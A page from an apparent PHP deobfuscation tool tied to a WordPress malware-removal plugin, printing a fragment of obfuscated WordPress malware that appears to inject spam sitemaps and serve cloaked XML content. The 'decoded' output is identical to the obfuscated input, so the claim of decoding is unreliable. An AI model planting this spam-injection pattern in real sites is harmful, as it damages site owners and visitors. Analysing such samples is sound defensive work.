Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%...



Obfuscated php code

<?php

@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
if (strpos($var02, "allsitemap.xml")) {
    $var17 = func2($var08, $arr1);
    header("Content-type:text/xml");
    echo $var17;
    exit;
}
if (strpos($var02, $O[59] . $O[9] . $O[15] . $O[9])) {
    $var21 = explode($O[55], $var02);
    $var21 = $var21[count($var21) - 1];
    $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21);
} else {
    $var21 = str_replace($O[63], "", $var02);
    $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21);
}
$arr1[$O[1] . $O[8] . $O[3] . $O[12]] = $var21;
$arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[11] . $O[7] . $O[4] . $O[2] . $O[25] . $O[10] . $O[9];
$var22 = func2($var10, $arr1);
if ($var22 == '1') {
    $var17 = func2($var08, $arr1);
    header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]);
    echo $var17;
    exit;
}
$arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[1] . $O[8] . $O[3] . $O[12] . $O[11];
$ooooooOOoOoOoooOOOooooOOoOoOO = func2($var10, $arr1);
if (strpos($var02, $O[25] . $O[10] . $O[9]) > 0 || $ooooooOOoOoOoooOOOooooOOoOoOO == '1') {
    $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[3] . $O[10] . $O[24] . $O[12] . $O[52] . $O[20] . $O[25] . $O[18];
    $var22 = func2($var10, $arr1);
    header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]);
    echo $var22;
    exit;
}

Decoded(de-Obfuscated) php code

<?php

@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
if (strpos($var02, "allsitemap.xml")) {
    $var17 = func2($var08, $arr1);
    header("Content-type:text/xml");
    echo $var17;
    exit;
}
if (strpos($var02, $O[59] . $O[9] . $O[15] . $O[9])) {
    $var21 = explode($O[55], $var02);
    $var21 = $var21[count($var21) - 1];
    $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21);
} else {
    $var21 = str_replace($O[63], "", $var02);
    $var21 = str_replace($O[59] . $O[20] . $O[25] . $O[18], "", $var21);
}
$arr1[$O[1] . $O[8] . $O[3] . $O[12]] = $var21;
$arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[11] . $O[7] . $O[4] . $O[2] . $O[25] . $O[10] . $O[9];
$var22 = func2($var10, $arr1);
if ($var22 == '1') {
    $var17 = func2($var08, $arr1);
    header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]);
    echo $var17;
    exit;
}
$arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[21] . $O[15] . $O[2] . $O[21] . $O[17] . $O[52] . $O[1] . $O[8] . $O[3] . $O[12] . $O[11];
$ooooooOOoOoOoooOOOooooOOoOoOO = func2($var10, $arr1);
if (strpos($var02, $O[25] . $O[10] . $O[9]) > 0 || $ooooooOOoOoOoooOOOooooOOoOoOO == '1') {
    $arr1[$O[10] . $O[21] . $O[4] . $O[7] . $O[8] . $O[24]] = $O[3] . $O[10] . $O[24] . $O[12] . $O[52] . $O[20] . $O[25] . $O[18];
    $var22 = func2($var10, $arr1);
    header($O[47] . $O[8] . $O[24] . $O[4] . $O[2] . $O[24] . $O[4] . $O[53] . $O[4] . $O[5] . $O[9] . $O[2] . $O[62] . $O[4] . $O[2] . $O[20] . $O[4] . $O[63] . $O[20] . $O[25] . $O[18]);
    echo $var22;
    exit;
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.